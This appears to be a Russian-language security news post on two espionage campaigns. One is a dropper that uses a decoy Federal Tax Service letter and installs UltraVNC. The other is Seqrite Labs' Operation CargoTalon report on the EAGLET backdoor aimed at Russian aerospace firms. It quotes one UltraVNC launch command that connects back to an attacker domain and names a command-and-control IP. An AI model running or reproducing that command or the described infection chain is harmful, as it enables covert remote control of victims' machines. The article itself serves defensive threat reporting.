Дроппер создавал на диске файлы: отвлекающий документ (Письмо_ФНС_России_от_[дата].pdf), утилиту WinRAR (beseeching.exe), архив с дополнительными файлами (centrifuges.rar), а также скрипт, запускающий распаковку RAR-архива (wowwow.cmd).

В свою очередь, RAR-архив содержал: экземпляр UltraVNC (PhPHost.exe), файл, запускающий его (bhumidar.bat), и answers.bat - скрипт для закрепления в системе через планировщик задач.

После демонстрации отвлекающего документа и закрепления в системе в фоновом режиме происходила инсталляция инструмента UltraVNC: start "" %public%\Documents\PnPHost.exe -autoreconnect ID:7o9_%COMPUTERNAME%_Y1 -connect furnitura-zamki[.]ru:443.

Иных подробностей исследователи не раскрывают. Возможно, в ближайшее время что-то появиться в блоге, так что будем следить.

Исследователи Seqrite Labs раскрыли кампанию кибершпионажа Operation CargoTalon, нацеленную на российские предприятия аэрокосмической и оборонной отраслей с использованием бэкдора EAGLET.

Вредоносная активность была атрибутирована к кластеру угроз, отслеживаемому как UNG0901 (Unknown Group 901).

Целями стали сотрудники Воронежского авиационного производственного объединения, одного из крупнейших предприятий по производству самолетов в России.

В атаках задействовались фишинговые письма с приманками на тему доставки грузов с ZIP-архивом, внутри которого находился LNK-файл, использующий PowerShell для отображения поддельного документа Microsoft Excel, а также внедряющий на хост файл DLL EAGLET.

EAGLET реализует сбор системной информации и устанавливает соединения с жестко запрограммированным удаленным сервером («185.225.17[.]104»), а после получения HTTP-ответа - выполняет на скомпрометированной машине Windows команды.

Имплант поддерживает доступ к оболочке и возможность загрузки/выгрузки файлов, но точный характер доставляемых полезных нагрузок следующего этапа неизвестен, учитывая, что сервер C2 к моменту исследования оставался в автономном режиме.

Исследователи Seqrite заявляют, что также обнаружили схожие кампании в отношении российского ВПК с использованием EAGLET, не говоря уже о совпадениях исходного кода и целей с Head Mare, о которых ранее сообщали исследователи Лаборатории Касперского.

В частности, отмечены функциональные параллели между EAGLET и PhantomDL - бэкдором на базе Go с оболочкой и возможностью загрузки/выгрузки файлов, а также сходство в алгоритме наименований, применяемой к вложениям в фишинговых сообщениях.

Индикаторы компрометации и технические подробности - в отчете индийской компании.